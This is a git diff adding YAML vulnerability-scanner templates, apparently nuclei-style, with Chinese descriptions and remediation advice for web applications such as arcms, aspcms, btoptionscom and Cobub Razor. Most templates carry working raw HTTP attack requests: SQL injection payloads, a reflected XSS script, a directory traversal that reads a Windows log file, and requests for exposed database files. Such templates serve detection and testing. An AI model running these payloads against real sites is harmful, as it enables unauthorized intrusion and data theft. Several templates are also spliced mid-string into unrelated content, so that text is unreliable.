1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200&&status_code_2==200&&status_code_3==200 + - contains(body_1,"Time") + - contains(body_2,"Warning") + - body_1!=body_2 + - body_2==body_3 + raw: + - | + GET /car-details.php?uid=8%27%20AND%202988=2988%20AND%20%27KcEp%27=%27KcEp HTTP/1.1 + Host: {{Hostname}} + - | + GET /car-details.php?uid=8%27%20AND%202988=2986%20AND%20%27KcEp%27=%27KcEp HTTP/1.1 + Host: {{Hostname}} + - | + GET /car-details.php?uid=8%27%20AND%202988=2986%20AND%20%27KcEp%27=%27KcEp HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/ahwebexperts/ahwebexperts-pagephp-sqli.yaml b/config/51pwn/yaml/ahwebexperts/ahwebexperts-pagephp-sqli.yaml new file mode 100755 index 000000000..98ff91576 --- /dev/null +++ b/config/51pwn/yaml/ahwebexperts/ahwebexperts-pagephp-sqli.yaml @@ -0,0 +1,44 @@ +id: ahwebexperts-pagephp-sqli +info: + name: ahwebexperts_page.php?page_id=注入 + author: + - jim2g + description: | + ahwebexperts_page.php?page_id=存在SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200&&status_code_2==200&&status_code_3==200 + - contains(body_1,'g\">&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200&&status_code_2==200&&status_code_3==200 + - contains(body_1,"Products") + - contains(body_2,"No Product Available") + - body_1!=body_2 + - body_2==body_3 + raw: + - | + GET /product.php?cat=11%27%20AND%208565=8565%20AND%20%27TVmM%27=%27TVmM HTTP/1.1 + Host: {{Hostname}} + - | + GET /product.php?cat=11%27%20AND%208565=8564%20AND%20%27TVmM%27=%27TVmM HTTP/1.1 + Host: {{Hostname}} + - | + GET /product.php?cat=11%27%20AND%208565=8564%20AND%20%27TVmM%27=%27TVmM HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/arcms/Arcms-json_newslist-sqli.yaml b/config/51pwn/yaml/arcms/Arcms-json_newslist-sqli.yaml new file mode 100755 index 000000000..848cb3920 --- /dev/null +++ b/config/51pwn/yaml/arcms/Arcms-json_newslist-sqli.yaml @@ -0,0 +1,33 @@ +id: Arcms-json_newslist-sqli +info: + name: Arcms json_newslist limit sql注入 + author: + - jim2g + description: "Arcms-json_newslist-存在SQL注入漏洞\n arcms是一套基于layui和arphp的内容管理系统。\n\narcms + 2018-03-19及之前版本中的ctl/main/Json.php、ctl/main/service/Data.php和comp/Db/Mysql.php文件存在SQL注入漏洞。远程攻击者可通过向json/newslist发送‘limit’参数利用该漏洞执行SQL命令。 " + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/assnr/arcms + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'202cb962ac59075b964b07152d234b7') + raw: + - | + GET /json/newslist?key=111&limit=1%20procedure%20analyse(extractvalue(rand(),concat(0x7e,md5(123))),1) HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/arcms/CNVD-2018-26783_1.yaml b/config/51pwn/yaml/arcms/CNVD-2018-26783_1.yaml new file mode 100755 index 000000000..8a76e7dbd --- /dev/null +++ b/config/51pwn/yaml/arcms/CNVD-2018-26783_1.yaml @@ -0,0 +1,32 @@ +id: CNVD-2018-26783_1 +info: + name: arcms img_images 未授权访问漏洞 + author: + - jim2g + description: "arcms img_images 未授权访问漏洞\narcms是一套基于layui和arphp的内容管理系统。\n\narcms 2018-03-19及之前版本中存在安全漏洞,该漏洞源于程序未能对index/main、user/useradd或img/images进行身份验证。攻击者可利用该漏洞获取未授权的访问权限。 " + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://nvd.nist.gov/vuln/detail/CVE-2018-19557 + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。 + 4、采用成熟的权限管理框架,如spring security。 + 5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。 + 6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。 + 7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'图片总数') + - contains(body,'批量删除') + raw: + - | + GET /img/images HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/arcms/bartarcms-allgallary-sqli.yaml b/config/51pwn/yaml/arcms/bartarcms-allgallary-sqli.yaml new file mode 100755 index 000000000..0c13bc356 --- /dev/null +++ b/config/51pwn/yaml/arcms/bartarcms-allgallary-sqli.yaml @@ -0,0 +1,35 @@ +id: bartarcms-allgallary-sqli +info: + name: bartarcms_allgallary.php_idcat=注入 + author: + - jim2g + description: | + arcms-bartarcms_allgallary.php_idcat存在SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'202cb962ac59075b964b07152d234b70') + raw: + - | + GET /pages/allgallary.php?idcatall=2&idcat=-2171%27%20UNION%20ALL%20SELECT%20CONCAT(0x7176707071,md5(123),0x7178767671)--%20UgIm HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/aspcms/AspCms_OEM-info.yaml b/config/51pwn/yaml/aspcms/AspCms_OEM-info.yaml new file mode 100755 index 000000000..8306d52dc --- /dev/null +++ b/config/51pwn/yaml/aspcms/AspCms_OEM-info.yaml @@ -0,0 +1,42 @@ +id: AspCms_OEM-info +info: + name: aspcms AspCms_OEM.asp逻辑漏洞暴露登陆地址 + author: + - jim2g + description: |- + ASPCMS信息泄漏漏洞 + ASPCMS最新版2.5.2以及ASPCMS2.3.x都存在这个问题,应该是通杀 在ASPCMS2.3.x中,ASPCMS的数据库在/data/目录下,为了防止数据库被下载,把数据库文件data.mdb重新命名为#data.asp,由于设置不当,使用%23编码#即可绕过访问,导致信息泄漏: http://127.0.0.1/data/%23data.asp 在最新版的2.5.2中,把数据库文件aspcms252.mdb重新命名为#aspcms252.asp,由于配置不当,使用%23编码#即可绕过访问,导致信息泄漏: http://127.0.0.1/data/%23aspcms252.asp 此问题通杀所有版本。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: or + dsl: + - status_code==200 + - status_code==500 + - type: dsl + condition: and + dsl: + - contains(body,'Standard Jet DB') + raw: + - | + GET /data/%23aspcms252.asp HTTP/1.1 + Host: {{Hostname}} + - | + GET /data/%23data.asp HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/aspcms/Aspcms-Backend-Leak.yaml b/config/51pwn/yaml/aspcms/Aspcms-Backend-Leak.yaml new file mode 100755 index 000000000..2df32d6c9 --- /dev/null +++ b/config/51pwn/yaml/aspcms/Aspcms-Backend-Leak.yaml @@ -0,0 +1,51 @@ +id: Aspcms-Backend-Leak +info: + name: Aspcms后台地址泄露 + author: + - l0ne1y + description: |- + aspcms后台地址泄露 + aspcms的自带插件都存在泄露后台地址的漏洞。 例如/plug/oem/AspCms_OEMFun.asp文件 + severity: low + remediation: |- + **官方修复方案:** + 暂无 + + **临时修复方案** + 1、后台管理系统禁止直接暴漏在互联网,需通过VPN等较为安全的接入方式访问内部系统。 + 2、后台管理系统所有页面开启身份认证,根据情况选择对应方式(认证用户,用户名密码)。 + 3、限制IP访问,绑定固定的IP访问后台管理系统。 + 4、采用成熟的权限管理框架,如spring security。 +requests: +- matchers: + - type: word + condition: and + words: + - ") + raw: + - | + GET /financial_times.php?issue=%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/btoptionscom/btoptionscom-hbr_php-sqli.yaml b/config/51pwn/yaml/btoptionscom/btoptionscom-hbr_php-sqli.yaml new file mode 100755 index 000000000..11707663b --- /dev/null +++ b/config/51pwn/yaml/btoptionscom/btoptionscom-hbr_php-sqli.yaml @@ -0,0 +1,35 @@ +id: btoptionscom-hbr_php-sqli +info: + name: btoptionscom_hbr_php_issue_sql联合注入 + author: + - jim2g + description: | + btoptionscom_hbr_php_issue_sql联合注入 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"202cb962ac59075b964b07152d234b70") + raw: + - | + GET /hbr.php?issue=12%20and%20(select%204386%20from(select%20count(*)%2cconcat(md5(123)%2c(select%20(elt(4386%3d4386%2c1)))%2c0x716b7a6271%2cfloor(rand(0)*2))x%20from%20information_schema.plugins%20group%20by%20x)a) HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/btoptionscom/btoptionscom-newspack-sqli.yaml b/config/51pwn/yaml/btoptionscom/btoptionscom-newspack-sqli.yaml new file mode 100755 index 000000000..e65eb4bee --- /dev/null +++ b/config/51pwn/yaml/btoptionscom/btoptionscom-newspack-sqli.yaml @@ -0,0 +1,35 @@ +id: btoptionscom-newspack-sqli +info: + name: btoptionscom_newspack_php_issue_sql联合注入 + author: + - jim2g + description: | + btoptionscom_newspack_php_issue_sql联合注入 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"202cb962ac59075b964b07152d234b70") + raw: + - | + GET /newspack.php?issue=12%20and%20(select%204386%20from(select%20count(*)%2cconcat(md5(123)%2c(select%20(elt(4386%3d4386%2c1)))%2c0x716b7a6271%2cfloor(rand(0)*2))x%20from%20information_schema.plugins%20group%20by%20x)a) HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/cartadis Cartadis Gespage/CVE-2021-33807.yaml b/config/51pwn/yaml/cartadis Cartadis Gespage/CVE-2021-33807.yaml new file mode 100755 index 000000000..d2faebd2c --- /dev/null +++ b/config/51pwn/yaml/cartadis Cartadis Gespage/CVE-2021-33807.yaml @@ -0,0 +1,50 @@ +id: CVE-2021-33807 +info: + name: Cartadis Gespage 8.2.1 - Directory Traversal + author: + - daffainfo + tags: + - cve + - cve2021 + - lfi + - gespage + description: |2- + Cartadis Gespage 路径遍历漏洞 + cartadis Cartadis Gespage是cartadis公司的一个应用软件。一个打印管理软件,它包括打印记帐、打印机监控、用户管理、支付、配额和重定向规则等功能,以实现对副本和打印的完整管理。 + + Cartadis Gespage存在路径遍历漏洞,该漏洞源于Cartadis Gespage允许在 gespage/doDownloadData 和 gespage/webapp/doDownloadData 中进行目录遍历 + reference: + - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-33807 + - https://www.gespage.com/cartadis-db/ + - https://www.cartadis.com/gespage-website/ + severity: high + classification: + cve-id: + - cve-2021-33807 + cwe-id: + - cwe-22 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:https://support.gespage.com/fr/support/solutions/articles/14000130201-security-advisory-gespage-directory-traversal\n\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。\n" +requests: +- matchers: + - type: word + part: body + words: + - 'NetpDoDomainJoin:' + - type: word + part: header + words: + - application/octet-stream + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log' + method: GET diff --git a/config/51pwn/yaml/cobubrazor/CNVD-2018-06472-1.yaml b/config/51pwn/yaml/cobubrazor/CNVD-2018-06472-1.yaml new file mode 100755 index 000000000..dc8887731 --- /dev/null +++ b/config/51pwn/yaml/cobubrazor/CNVD-2018-06472-1.yaml @@ -0,0 +1,38 @@ +id: CNVD-2018-06472-1 +info: + name: cobubrazor_v8_index.php_platform参数_sql注入 + author: + - jim2g + description: |- + cobubrazor_v8_index.php_platform参数_sql注入 + Western Bridge Cobub Razor是一套开源的移动应用程序分析系统。该系统能够为用户提供详细的多维度报告并监控其移动应用和应用程序用户行为的统计数据。 + + Western Bridge Cobub Razor 0.8.0版本中存在SQL注入漏洞。远程攻击者可借助/index.php?/manage/channel/addchannel请求中的‘channel_name’或‘platform’参数利用该漏洞获取信息。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.cobub.com/cobub-razor/ + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==500 + - contains(body,'202cb962ac59075b964b07152d234b701') + raw: + - | + POST /razor/index.php?/manage/channel/addchannel HTTP/1.1 + Host: {{Hostname}} + + channel_name=testn&platform=" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(md5(123),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon + req-condition: true diff --git a/config/51pwn/yaml/cobubrazor/CNVD-2018-06472.yaml b/config/51pwn/yaml/cobubrazor/CNVD-2018-06472.yaml new file mode 100755 index 000000000..8daf3d730 --- /dev/null +++ b/config/51pwn/yaml/cobubrazor/CNVD-2018-06472.yaml @@ -0,0 +1,36 @@ +id: CNVD-2018-06472 +info: + name: cobubrazor_v8_index.php_channel_name参数_sql注入 + author: + - jim2g + description: "cobubrazor_v8_index.php_channel_name参数_sql注入\nWestern Bridge Cobub + Razor是一套开源的移动应用程序分析系统。该系统能够为用户提供详细的多维度报告并监控其移动应用和应用程序用户行为的统计数据。\n\nWestern Bridge + Cobub Razor 0.8.0版本中存在SQL注入漏洞。远程攻击者可借助/index.php?/manage/channel/addchannel请求中的‘channel_name’或‘platform’参数利用该漏洞获取信息。 " + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.cobub.com/cobub-razor/ + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==500 + - contains(body,'202cb962ac59075b964b07152d234b701') + raw: + - | + POST /razor/index.php?/manage/channel/addchannel HTTP/1.1 + Host: {{Hostname}} + + channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(md5(123),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1 + req-condition: true diff --git a/config/51pwn/yaml/cobubrazor/Ccobubrazor_v8-generate-info.yaml b/config/51pwn/yaml/cobubrazor/Ccobubrazor_v8-generate-info.yaml new file mode 100755 index 000000000..29e0361d4 --- /dev/null +++ b/config/51pwn/yaml/cobubrazor/Ccobubrazor_v8-generate-info.yaml @@ -0,0 +1,35 @@ +id: Ccobubrazor_v8-generate-info +info: + name: cobubrazor_generate.php_物理路径泄露 + author: + - jim2g + description: | + cobubrazor_generate.php_物理路径泄露 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://c4j.cn/ + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 